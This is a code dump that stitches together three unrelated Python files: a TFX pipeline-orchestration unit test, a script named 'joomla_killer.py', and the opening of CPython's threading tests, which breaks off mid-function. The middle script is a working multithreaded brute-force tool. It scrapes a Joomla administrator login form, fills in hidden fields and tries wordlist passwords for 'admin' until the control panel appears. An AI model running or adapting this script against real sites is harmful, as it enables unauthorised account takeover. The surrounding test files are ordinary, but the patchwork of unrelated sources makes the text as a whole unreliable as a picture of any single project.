from absl.testing.absltest import mock
import tensorflow as tf
from tfx.orchestration import metadata
from tfx.orchestration.experimental.core import async_pipeline_task_gen
from tfx.orchestration.experimental.core import pipeline_ops
from tfx.orchestration.experimental.core import pipeline_state as pstate
from tfx.orchestration.experimental.core import service_jobs
from tfx.orchestration.experimental.core import sync_pipeline_task_gen
from tfx.orchestration.experimental.core import task as task_lib
from tfx.orchestration.experimental.core import task_gen_utils
from tfx.orchestration.experimental.core import task_queue as tq
from tfx.orchestration.experimental.core import test_utils
from tfx.orchestration.portable.mlmd import execution_lib
from tfx.proto.orchestration import pipeline_pb2
from tfx.utils import status as status_lib
from ml_metadata.proto import metadata_store_pb2
def _test_pipeline(pipeline_id,
execution_mode: pipeline_pb2.Pipeline.ExecutionMode = (
pipeline_pb2.Pipeline.ASYNC)):
pipeline = pipeline_pb2.Pipeline()
pipeline.pipeline_info.id = pipeline_id
pipeline.execution_mode = execution_mode
if execution_mode == pipeline_pb2.Pipeline.SYNC:
pipeline.runtime_spec.pipeline_run_id.field_value.string_value = 'run0'
return pipeline
class PipelineOpsTest(test_utils.TfxTest, parameterized.TestCase):
def setUp(self):
super(PipelineOpsTest, self).setUp()
pipeline_root = os.path.join(
os.environ.get('TEST_UNDECLARED_OUTPUTS_DIR', self.get_temp_dir()),
self.id())
# Makes sure multiple connections within a test always connect to the same
# MLMD instance.
metadata_path = os.path.join(pipeline_root, 'metadata', 'metadata.db')
self._metadata_path = metadata_path
connection_config = metadata.sqlite_metadata_connection_config(
metadata_path)
connection_config.sqlite.SetInParent()
self._mlmd_connection = metadata.Metadata(
connection_config=connection_config)
@parameterized.named_parameters(
dict(testcase_name='async', pipeline=_test_pipeline('pipeline1')),
dict(
testcase_name='sync',
pipeline=_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC)))
def test_initiate_pipeline_start(self, pipeline):
with self._mlmd_connection as m:
# Initiate a pipeline start.
with pipeline_ops.initiate_pipeline_start(m, pipeline) as pipeline_state1:
self.assertProtoPartiallyEquals(
pipeline, pipeline_state1.pipeline, ignored_fields=['runtime_spec'])
self.assertEqual(metadata_store_pb2.Execution.NEW,
pipeline_state1.execution.last_known_state)
# Initiate another pipeline start.
pipeline2 = _test_pipeline('pipeline2')
with pipeline_ops.initiate_pipeline_start(m,
pipeline2) as pipeline_state2:
self.assertEqual(pipeline2, pipeline_state2.pipeline)
self.assertEqual(metadata_store_pb2.Execution.NEW,
pipeline_state2.execution.last_known_state)
# Error if attempted to initiate when old one is active.
with self.assertRaises(status_lib.StatusNotOkError) as exception_context:
pipeline_ops.initiate_pipeline_start(m, pipeline)
self.assertEqual(status_lib.Code.ALREADY_EXISTS,
exception_context.exception.code)
# Fine to initiate after the previous one is inactive.
with pipeline_state1:
execution = pipeline_state1.execution
execution.last_known_state = metadata_store_pb2.Execution.COMPLETE
with pipeline_ops.initiate_pipeline_start(m, pipeline) as pipeline_state3:
self.assertEqual(metadata_store_pb2.Execution.NEW,
pipeline_state3.execution.last_known_state)
@parameterized.named_parameters(
dict(testcase_name='async', pipeline=_test_pipeline('pipeline1')),
dict(
testcase_name='sync',
pipeline=_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC)))
def test_stop_pipeline_non_existent_or_inactive(self, pipeline):
with self._mlmd_connection as m:
# Stop pipeline without creating one.
with self.assertRaises(status_lib.StatusNotOkError) as exception_context:
pipeline_ops.stop_pipeline(m,
task_lib.PipelineUid.from_pipeline(pipeline))
self.assertEqual(status_lib.Code.NOT_FOUND,
exception_context.exception.code)
# Initiate pipeline start and mark it completed.
pipeline_ops.initiate_pipeline_start(m, pipeline)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
pipeline_state.initiate_stop(status_lib.Status(code=status_lib.Code.OK))
pipeline_state.execution.last_known_state = (
metadata_store_pb2.Execution.COMPLETE)
# Try to initiate stop again.
with self.assertRaises(status_lib.StatusNotOkError) as exception_context:
pipeline_ops.stop_pipeline(m, pipeline_uid)
self.assertEqual(status_lib.Code.NOT_FOUND,
exception_context.exception.code)
@parameterized.named_parameters(
dict(testcase_name='async', pipeline=_test_pipeline('pipeline1')),
dict(
testcase_name='sync',
pipeline=_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC)))
def test_stop_pipeline_wait_for_inactivation(self, pipeline):
with self._mlmd_connection as m:
pipeline_state = pipeline_ops.initiate_pipeline_start(m, pipeline)
def _inactivate(pipeline_state):
time.sleep(2.0)
with pipeline_ops._PIPELINE_OPS_LOCK:
with pipeline_state:
execution = pipeline_state.execution
execution.last_known_state = metadata_store_pb2.Execution.COMPLETE
thread = threading.Thread(target=_inactivate, args=(pipeline_state,))
thread.start()
pipeline_ops.stop_pipeline(
m, task_lib.PipelineUid.from_pipeline(pipeline), timeout_secs=10.0)
thread.join()
@parameterized.named_parameters(
dict(testcase_name='async', pipeline=_test_pipeline('pipeline1')),
dict(
testcase_name='sync',
pipeline=_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC)))
def test_stop_pipeline_wait_for_inactivation_timeout(self, pipeline):
with self._mlmd_connection as m:
pipeline_ops.initiate_pipeline_start(m, pipeline)
with self.assertRaisesRegex(
status_lib.StatusNotOkError,
'Timed out.*waiting for execution inactivation.'
) as exception_context:
pipeline_ops.stop_pipeline(
m, task_lib.PipelineUid.from_pipeline(pipeline), timeout_secs=1.0)
self.assertEqual(status_lib.Code.DEADLINE_EXCEEDED,
exception_context.exception.code)
def test_stop_node_no_active_executions(self):
pipeline = pipeline_pb2.Pipeline()
self.load_proto_from_text(
os.path.join(
os.path.dirname(__file__), 'testdata', 'async_pipeline.pbtxt'),
pipeline)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
node_uid = task_lib.NodeUid(node_id='my_trainer', pipeline_uid=pipeline_uid)
with self._mlmd_connection as m:
pstate.PipelineState.new(m, pipeline)
pipeline_ops.stop_node(m, node_uid)
pipeline_state = pstate.PipelineState.load(m, pipeline_uid)
# The node should be stop-initiated even when node is inactive to prevent
# future triggers.
with pipeline_state:
self.assertEqual(
status_lib.Code.CANCELLED,
pipeline_state.node_stop_initiated_reason(node_uid).code)
# Restart node.
pipeline_state = pipeline_ops.initiate_node_start(m, node_uid)
with pipeline_state:
self.assertIsNone(pipeline_state.node_stop_initiated_reason(node_uid))
def test_stop_node_wait_for_inactivation(self):
pipeline = pipeline_pb2.Pipeline()
self.load_proto_from_text(
os.path.join(
os.path.dirname(__file__), 'testdata', 'async_pipeline.pbtxt'),
pipeline)
trainer = pipeline.nodes[2].pipeline_node
test_utils.fake_component_output(
self._mlmd_connection, trainer, active=True)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
node_uid = task_lib.NodeUid(node_id='my_trainer', pipeline_uid=pipeline_uid)
with self._mlmd_connection as m:
pstate.PipelineState.new(m, pipeline)
def _inactivate(execution):
time.sleep(2.0)
with pipeline_ops._PIPELINE_OPS_LOCK:
execution.last_known_state = metadata_store_pb2.Execution.COMPLETE
m.store.put_executions([execution])
execution = task_gen_utils.get_executions(m, trainer)[0]
thread = threading.Thread(
target=_inactivate, args=(copy.deepcopy(execution),))
thread.start()
pipeline_ops.stop_node(m, node_uid, timeout_secs=5.0)
thread.join()
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
self.assertEqual(
status_lib.Code.CANCELLED,
pipeline_state.node_stop_initiated_reason(node_uid).code)
# Restart node.
with pipeline_ops.initiate_node_start(m, node_uid) as pipeline_state:
self.assertIsNone(pipeline_state.node_stop_initiated_reason(node_uid))
def test_stop_node_wait_for_inactivation_timeout(self):
pipeline = pipeline_pb2.Pipeline()
self.load_proto_from_text(
os.path.join(
os.path.dirname(__file__), 'testdata', 'async_pipeline.pbtxt'),
pipeline)
trainer = pipeline.nodes[2].pipeline_node
test_utils.fake_component_output(
self._mlmd_connection, trainer, active=True)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
node_uid = task_lib.NodeUid(node_id='my_trainer', pipeline_uid=pipeline_uid)
with self._mlmd_connection as m:
pstate.PipelineState.new(m, pipeline)
with self.assertRaisesRegex(
status_lib.StatusNotOkError,
'Timed out.*waiting for execution inactivation.'
) as exception_context:
pipeline_ops.stop_node(m, node_uid, timeout_secs=1.0)
self.assertEqual(status_lib.Code.DEADLINE_EXCEEDED,
exception_context.exception.code)
# Even if `wait_for_inactivation` times out, the node should be stop
# initiated to prevent future triggers.
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
self.assertEqual(
status_lib.Code.CANCELLED,
pipeline_state.node_stop_initiated_reason(node_uid).code)
@mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator')
@mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator')
def test_orchestrate_active_pipelines(self, mock_async_task_gen,
mock_sync_task_gen):
with self._mlmd_connection as m:
# Sync and async active pipelines.
async_pipelines = [
_test_pipeline('pipeline1'),
_test_pipeline('pipeline2'),
]
sync_pipelines = [
_test_pipeline('pipeline3', pipeline_pb2.Pipeline.SYNC),
_test_pipeline('pipeline4', pipeline_pb2.Pipeline.SYNC),
]
for pipeline in async_pipelines + sync_pipelines:
pipeline_ops.initiate_pipeline_start(m, pipeline)
# Active executions for active async pipelines.
mock_async_task_gen.return_value.generate.side_effect = [
[
test_utils.create_exec_node_task(
task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid.from_pipeline(
async_pipelines[0]),
node_id='Transform'))
],
[
test_utils.create_exec_node_task(
task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid.from_pipeline(
async_pipelines[1]),
node_id='Trainer'))
],
]
# Active executions for active sync pipelines.
mock_sync_task_gen.return_value.generate.side_effect = [
[
test_utils.create_exec_node_task(
task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid.from_pipeline(
sync_pipelines[0]),
node_id='Trainer'))
],
[
test_utils.create_exec_node_task(
task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid.from_pipeline(
sync_pipelines[1]),
node_id='Validator'))
],
]
task_queue = tq.TaskQueue()
pipeline_ops.orchestrate(m, task_queue,
service_jobs.DummyServiceJobManager())
self.assertEqual(2, mock_async_task_gen.return_value.generate.call_count)
self.assertEqual(2, mock_sync_task_gen.return_value.generate.call_count)
# Verify that tasks are enqueued in the expected order.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual(
test_utils.create_node_uid('pipeline1', 'Transform'), task.node_uid)
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual(
test_utils.create_node_uid('pipeline2', 'Trainer'), task.node_uid)
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual(
test_utils.create_node_uid('pipeline3', 'Trainer'), task.node_uid)
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual(
test_utils.create_node_uid('pipeline4', 'Validator'), task.node_uid)
self.assertTrue(task_queue.is_empty())
@parameterized.parameters(
_test_pipeline('pipeline1'),
_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC))
@mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator')
@mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator')
@mock.patch.object(task_gen_utils, 'generate_task_from_active_execution')
def test_stop_initiated_pipelines(self, pipeline, mock_gen_task_from_active,
mock_async_task_gen, mock_sync_task_gen):
with self._mlmd_connection as m:
pipeline.nodes.add().pipeline_node.node_info.id = 'ExampleGen'
pipeline.nodes.add().pipeline_node.node_info.id = 'Transform'
pipeline.nodes.add().pipeline_node.node_info.id = 'Trainer'
pipeline.nodes.add().pipeline_node.node_info.id = 'Evaluator'
mock_service_job_manager = mock.create_autospec(
service_jobs.ServiceJobManager, instance=True)
mock_service_job_manager.is_pure_service_node.side_effect = (
lambda _, node_id: node_id == 'ExampleGen')
mock_service_job_manager.is_mixed_service_node.side_effect = (
lambda _, node_id: node_id == 'Transform')
pipeline_ops.initiate_pipeline_start(m, pipeline)
with pstate.PipelineState.load(
m, task_lib.PipelineUid.from_pipeline(pipeline)) as pipeline_state:
pipeline_state.initiate_stop(
status_lib.Status(code=status_lib.Code.CANCELLED))
pipeline_execution_id = pipeline_state.execution.id
task_queue = tq.TaskQueue()
# For the stop-initiated pipeline, "Transform" execution task is in queue,
# "Trainer" has an active execution in MLMD but no task in queue,
# "Evaluator" has no active execution.
task_queue.enqueue(
test_utils.create_exec_node_task(
task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid.from_pipeline(pipeline),
node_id='Transform')))
transform_task = task_queue.dequeue() # simulates task being processed
mock_gen_task_from_active.side_effect = [
test_utils.create_exec_node_task(
node_uid=task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid.from_pipeline(pipeline),
node_id='Trainer'),
is_cancelled=True), None, None, None, None
]
pipeline_ops.orchestrate(m, task_queue, mock_service_job_manager)
# There are no active pipelines so these shouldn't be called.
mock_async_task_gen.assert_not_called()
mock_sync_task_gen.assert_not_called()
# stop_node_services should be called for ExampleGen which is a pure
# service node.
mock_service_job_manager.stop_node_services.assert_called_once_with(
mock.ANY, 'ExampleGen')
mock_service_job_manager.reset_mock()
task_queue.task_done(transform_task) # Pop out transform task.
# CancelNodeTask for the "Transform" ExecNodeTask should be next.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_cancel_node_task(task))
self.assertEqual('Transform', task.node_uid.node_id)
# ExecNodeTask (with is_cancelled=True) for "Trainer" is next.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual('Trainer', task.node_uid.node_id)
self.assertTrue(task.is_cancelled)
self.assertTrue(task_queue.is_empty())
mock_gen_task_from_active.assert_has_calls([
mock.call(
m,
pipeline_state.pipeline,
pipeline.nodes[2].pipeline_node,
mock.ANY,
is_cancelled=True),
mock.call(
m,
pipeline_state.pipeline,
pipeline.nodes[3].pipeline_node,
mock.ANY,
is_cancelled=True)
])
self.assertEqual(2, mock_gen_task_from_active.call_count)
# Pipeline execution should continue to be active since active node
# executions were found in the last call to `orchestrate`.
[execution] = m.store.get_executions_by_id([pipeline_execution_id])
self.assertTrue(execution_lib.is_execution_active(execution))
# Call `orchestrate` again; this time there are no more active node
# executions so the pipeline should be marked as cancelled.
pipeline_ops.orchestrate(m, task_queue, mock_service_job_manager)
self.assertTrue(task_queue.is_empty())
[execution] = m.store.get_executions_by_id([pipeline_execution_id])
self.assertEqual(metadata_store_pb2.Execution.CANCELED,
execution.last_known_state)
# stop_node_services should be called on both ExampleGen and Transform
# which are service nodes.
mock_service_job_manager.stop_node_services.assert_has_calls(
[mock.call(mock.ANY, 'ExampleGen'),
mock.call(mock.ANY, 'Transform')],
any_order=True)
@mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator')
@mock.patch.object(task_gen_utils, 'generate_task_from_active_execution')
def test_active_pipelines_with_stop_initiated_nodes(self,
mock_gen_task_from_active,
mock_async_task_gen):
with self._mlmd_connection as m:
pipeline = _test_pipeline('pipeline')
pipeline.nodes.add().pipeline_node.node_info.id = 'ExampleGen'
pipeline.nodes.add().pipeline_node.node_info.id = 'Transform'
pipeline.nodes.add().pipeline_node.node_info.id = 'Trainer'
pipeline.nodes.add().pipeline_node.node_info.id = 'Evaluator'
mock_service_job_manager = mock.create_autospec(
service_jobs.ServiceJobManager, instance=True)
mock_service_job_manager.is_pure_service_node.side_effect = (
lambda _, node_id: node_id == 'ExampleGen')
example_gen_node_uid = task_lib.NodeUid.from_pipeline_node(
pipeline, pipeline.nodes[0].pipeline_node)
transform_node_uid = task_lib.NodeUid.from_pipeline_node(
pipeline, pipeline.nodes[1].pipeline_node)
transform_task = test_utils.create_exec_node_task(
node_uid=transform_node_uid)
trainer_node_uid = task_lib.NodeUid.from_pipeline_node(
pipeline, pipeline.nodes[2].pipeline_node)
trainer_task = test_utils.create_exec_node_task(node_uid=trainer_node_uid)
evaluator_node_uid = task_lib.NodeUid.from_pipeline_node(
pipeline, pipeline.nodes[3].pipeline_node)
evaluator_task = test_utils.create_exec_node_task(
node_uid=evaluator_node_uid)
cancelled_evaluator_task = test_utils.create_exec_node_task(
node_uid=evaluator_node_uid, is_cancelled=True)
pipeline_ops.initiate_pipeline_start(m, pipeline)
with pstate.PipelineState.load(
m, task_lib.PipelineUid.from_pipeline(pipeline)) as pipeline_state:
# Stop example-gen, trainer and evaluator.
pipeline_state.initiate_node_stop(
example_gen_node_uid,
status_lib.Status(code=status_lib.Code.CANCELLED))
pipeline_state.initiate_node_stop(
trainer_node_uid, status_lib.Status(code=status_lib.Code.CANCELLED))
pipeline_state.initiate_node_stop(
evaluator_node_uid, status_lib.Status(code=status_lib.Code.ABORTED))
task_queue = tq.TaskQueue()
# Simulate a new transform execution being triggered.
mock_async_task_gen.return_value.generate.return_value = [transform_task]
# Simulate ExecNodeTask for trainer already present in the task queue.
task_queue.enqueue(trainer_task)
# Simulate Evaluator having an active execution in MLMD.
mock_gen_task_from_active.side_effect = [evaluator_task]
pipeline_ops.orchestrate(m, task_queue, mock_service_job_manager)
self.assertEqual(1, mock_async_task_gen.return_value.generate.call_count)
# stop_node_services should be called on example-gen which is a pure
# service node.
mock_service_job_manager.stop_node_services.assert_called_once_with(
mock.ANY, 'ExampleGen')
# Verify that tasks are enqueued in the expected order:
# Pre-existing trainer task.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertEqual(trainer_task, task)
# CancelNodeTask for trainer.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_cancel_node_task(task))
self.assertEqual(trainer_node_uid, task.node_uid)
# ExecNodeTask with is_cancelled=True for evaluator.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(cancelled_evaluator_task, task)
# ExecNodeTask for newly triggered transform node.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertEqual(transform_task, task)
# No more tasks.
self.assertTrue(task_queue.is_empty())
@mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator')
def test_handling_finalize_pipeline_task(self, task_gen):
with self._mlmd_connection as m:
pipeline = _test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC)
pipeline_ops.initiate_pipeline_start(m, pipeline)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
finalize_reason = status_lib.Status(
code=status_lib.Code.ABORTED, message='foo bar')
task_gen.return_value.generate.side_effect = [
[
task_lib.FinalizePipelineTask(
pipeline_uid=pipeline_uid, status=finalize_reason)
],
]
task_queue = tq.TaskQueue()
pipeline_ops.orchestrate(m, task_queue,
service_jobs.DummyServiceJobManager())
task_gen.return_value.generate.assert_called_once()
self.assertTrue(task_queue.is_empty())
# Load pipeline state and verify stop initiation.
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
self.assertEqual(finalize_reason,
pipeline_state.stop_initiated_reason())
@mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator')
def test_handling_finalize_node_task(self, task_gen):
with self._mlmd_connection as m:
pipeline = _test_pipeline('pipeline1')
pipeline.nodes.add().pipeline_node.node_info.id = 'Transform'
pipeline.nodes.add().pipeline_node.node_info.id = 'Trainer'
pipeline_ops.initiate_pipeline_start(m, pipeline)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
finalize_reason = status_lib.Status(
code=status_lib.Code.ABORTED, message='foo bar')
task_gen.return_value.generate.side_effect = [
[
test_utils.create_exec_node_task(
task_lib.NodeUid(
pipeline_uid=pipeline_uid, node_id='Transform')),
task_lib.FinalizeNodeTask(
node_uid=task_lib.NodeUid(
pipeline_uid=pipeline_uid, node_id='Trainer'),
status=finalize_reason)
],
]
task_queue = tq.TaskQueue()
pipeline_ops.orchestrate(m, task_queue,
service_jobs.DummyServiceJobManager())
task_gen.return_value.generate.assert_called_once()
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual(
test_utils.create_node_uid('pipeline1', 'Transform'), task.node_uid)
# Load pipeline state and verify node stop initiation.
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
self.assertEqual(
finalize_reason,
pipeline_state.node_stop_initiated_reason(
task_lib.NodeUid(pipeline_uid=pipeline_uid, node_id='Trainer')))
def test_to_status_not_ok_error_decorator(self):
@pipeline_ops._to_status_not_ok_error
def fn1():
raise RuntimeError('test error 1')
@pipeline_ops._to_status_not_ok_error
def fn2():
raise status_lib.StatusNotOkError(
code=status_lib.Code.ALREADY_EXISTS, message='test error 2')
with self.assertRaisesRegex(status_lib.StatusNotOkError,
'test error 1') as ctxt:
fn1()
self.assertEqual(status_lib.Code.UNKNOWN, ctxt.exception.code)
with self.assertRaisesRegex(status_lib.StatusNotOkError,
'test error 2') as ctxt:
fn2()
self.assertEqual(status_lib.Code.ALREADY_EXISTS, ctxt.exception.code)
if __name__ == '__main__':
tf.test.main()
|
joomla_killer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import urllib2
import urllib
import cookielib
import threading
import sys
import Queue
from HTMLParser import HTMLParser
# 共通の設定
user_thread = 10
username = "admin"
wordlist_file = "/tmp/cain.txt"
resume = None
# ターゲットに合わせた設定
target_url = "http://192.168.112.131/administrator/index.php"
target_post = "http://192.168.112.131/administrator/index.php"
username_field= "username"
password_field= "passwd"
success_check = "Administration - Control Panel"
class BruteParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self.tag_results = {}
def handle_starttag(self, tag, attrs):
if tag == "input":
tag_name = None
tag_value = None
for name,value in attrs:
if name == "name":
tag_name = value
if name == "value":
tag_value = value
if tag_name is not None:
self.tag_results[tag_name] = value
class Bruter(object):
def __init__(self, username, words):
self.username = username
self.password_q = words
self.found = False
print "Finished setting up for: %s" % username
def run_bruteforce(self):
for i in range(user_thread):
t = threading.Thread(target=self.web_bruter)
t.start()
def web_bruter(self):
while not self.password_q.empty() and not self.found:
brute = self.password_q.get().rstrip()
jar = cookielib.FileCookieJar("cookies")
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
response = opener.open(target_url)
page = response.read()
print "Trying: %s : %s (%d left)" % (self.username,brute,self.password_q.qsize())
# hiddenフィールドをパース
parser = BruteParser()
parser.feed(page)
post_tags = parser.tag_results
# usernameフィールドとpasswordフィールドを追加
post_tags[username_field] = self.username
post_tags[password_field] = brute
login_data = urllib.urlencode(post_tags)
login_response = opener.open(target_post, login_data)
login_result = login_response.read()
if success_check in login_result:
self.found = True
print "[*] Bruteforce successful."
print "[*] Username: %s" % username
print "[*] Password: %s" % brute
print "[*] Waiting for other threads to exit..."
def build_wordlist(wordlist_file):
# 単語の辞書を読み取る
fd = open(wordlist_file,"rb")
raw_words = fd.readlines()
fd.close()
found_resume = False
words = Queue.Queue()
for word in raw_words:
word = word.rstrip()
if resume is not None:
if found_resume:
words.put(word)
else:
if word == resume:
found_resume = True
print "Resuming wordlist from: %s" % resume
else:
words.put(word)
return words
words = build_wordlist(wordlist_file)
bruter_obj = Bruter(username,words)
bruter_obj.run_bruteforce()
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import threading_helper
from test.support import verbose, cpython_only
from test.support.import_helper import import_module
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
import signal
import textwrap
from unittest import mock
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('netbsd5', 'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = threading_helper.threading_setup()
def tearDown(self):
threading_helper.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
@cpython_only
def test_name(self):
def func(): pass
thread = threading.Thread(name="myname1")
self.assertEqual(thread.name, "myname1")
# Convert int name to str
thread = threading.Thread(name=123)
self.assertEqual(thread.name, "123")
# target name is ignored if name is specified
thread = threading.Thread(target=func, name="myname2")
self.assertEqual(thread.name, "myname2")
with mock.patch.object(threading, '_counter', return_value=2):
thread = threading.Thread(name="")
self.assertEqual(thread.name, "Thread-2")
with mock.patch.object(threading, '_counter', return_value=3):
thread = threading.Thread()
self.assertEqual(thread.name, "Thread-3")
with mock.patch.object(threading, '_counter', return_value=5):
thread = threading.Thread(target=func)
self.assertEqual(thread.name, "Thread-5 (func)")
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if hasattr(threading, 'get_native_id'):
native_ids = set(t.native_id for t in threads) | {threading.get_native_id()}
self.assertNotIn(None, native_ids)
self.assertEqual(len(native_ids), NUMTASKS + 1)
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with threading_helper.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with threading_helper.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
